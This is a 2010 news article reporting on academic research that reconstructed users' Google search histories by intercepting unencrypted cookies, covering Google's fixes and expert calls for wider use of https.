Skip to Content
Uncategorized

Peeking Into Users’ Web History

Researchers hijack Google’s personalized search suggestions to reconstruct users’ search histories.
April 21, 2010

Personalization is a key part of Internet search, providing more relevant results and gaining loyal customers in the process. But new research highlights the privacy risks that this kind of personalization can bring. A team of European researchers, working with a researcher from the University of California, Irvine, found that they were able to hijack Google’s personalized search suggestions to reconstruct users’ Web search histories.

Google has plugged most of the holes identified in the research, but the researchers say that other personalized services are likely to have similar vulnerabilities. “The goal of this project was to show that personalized services are very dangerous in terms of privacy because they can leak information,” says Claude Castelluccia, a senior research scientist at the French National Institute for Research in Computer Science and Control, who was involved with the work. The work will be presented this summer at the Privacy Enhancing Technologies Symposium in Berlin, Germany.

The researchers got hold of personal information by taking advantage of the fact that Google uses two different protocols to communicate with its users’ browsers. Google protects sensitive information, such as passwords, by using a protocol called “https” that encrypts the data as it’s communicated. Other times, when dealing with search queries for example, Google uses the ordinary “http” protocol, which sends information back and forth in the clear. The researchers say this mixed design can inadvertently reveal information.

Google offers a variety of Web services, including Gmail, Google Docs, and Google Calendar. A less well-known service is Google Web History, which records searches made by a user while she is signed in to her Google Account. At the time the researchers were investigating it, Web History was also the source of personalized suggestions that Google offered users on its search page.

The researchers were able to get access to users’ Web History by intercepting cookies–files stored on a person’s computer that hold useful bits of information such as authentication credentials or the contents of a shopping cart. For many services, such as Gmail, this information is encrypted before it is sent. At the time, Web History sent its cookies in the clear. By eavesdropping on an unsecured network, such as a public Wi-Fi hotspot, an attacker can intercept Web cookies. The researchers determined that intercepted Web History cookies could provide access to that user’s Web History account.

History repeating: Google’s Web History was used to create personalized search suggestions, such as those shown above, until researchers discovered that personal information could be captured by hijacking communications with users.

The researchers also found another way to reconstruct users’ search history. Another cookie–the one that authenticates a user to Google’s search service–is also sent in the clear. By capturing this cookie and impersonating the user in communications with the search service, they were able to run algorithms that quickly reconstructed large portions of a user’s Web search history.

Castelluccia says companies should recognize that they need to use secure channels whenever a user’s personal information is being transmitted. “The main lesson of the attack is that companies should use https as much as possible,” he says, adding, “Of course, https has a cost–it means Google has to use more servers, energy, and all that.”

Google responded to the researchers by changing its Web History so that it does always use encrypted communications. The company also temporarily suspended its search suggestion service. And suggestions for Google Maps, which the researchers were also able to access, are now encrypted, too.

Alma Whitten, software engineer for Google’s Security and Privacy arm, said in a statement that Google increased its use of https in response to the researchers. “Google has been and continues to be an industry leader in providing support for encryption in our services, which is designed to address precisely the issues that all major websites face when transmitting information over http to users connecting via an unsecured network channel,” she said.

“Google was very reactive and very responsible,” Castelluccia says. However, he notes that search suggestions are still being provided via mobile phones and are still vulnerable. The researchers are keeping track of which services are vulnerable on a website devoted to the project. (Update May 17, 2010: Google fixed the mobile issue described on April 28.)

Ben Adida, a fellow at Harvard University’s Center for Research on Computation and Society, says that intercepting unencrypted traffic is “trivial” today, and “the consequences can be surprisingly privacy-invasive.” He adds, “This work is nice because it concisely shows how half-measures often provide little protection: there is a growing need to move all sensitive services to [https].”

However, Adida warns that encryption won’t solve all privacy problems. “We are slowly entrusting more of our data to large companies that then risk becoming targets of large-scale attacks,” he says. “It’s important to continuously secure these services, but it’s equally important to realize the inherent risk we run by giving this data to third parties in the first place.”

Keep Reading

Most Popular

Large language models can do jaw-dropping things. But nobody knows exactly why.

And that's a problem. Figuring it out is one of the biggest scientific puzzles of our time and a crucial step towards controlling more powerful future models.

OpenAI teases an amazing new generative video model called Sora

The firm is sharing Sora with a small group of safety testers but the rest of us will have to wait to learn more.

Google’s Gemini is now in everything. Here’s how you can try it out.

Gmail, Docs, and more will now come with Gemini baked in. But Europeans will have to wait before they can download the app.

This baby with a head camera helped teach an AI how kids learn language

A neural network trained on the experiences of a single young child managed to learn one of the core components of language: how to match words to the objects they represent.

Stay connected

Illustration by Rose Wong

Get the latest updates from
MIT Technology Review

Discover special offers, top stories, upcoming events, and more.

Thank you for submitting your email!

Explore more newsletters

It looks like something went wrong.

We’re having trouble saving your preferences. Try refreshing this page and updating them one more time. If you continue to get this message, reach out to us at customer-service@technologyreview.com with a list of newsletters you’d like to receive.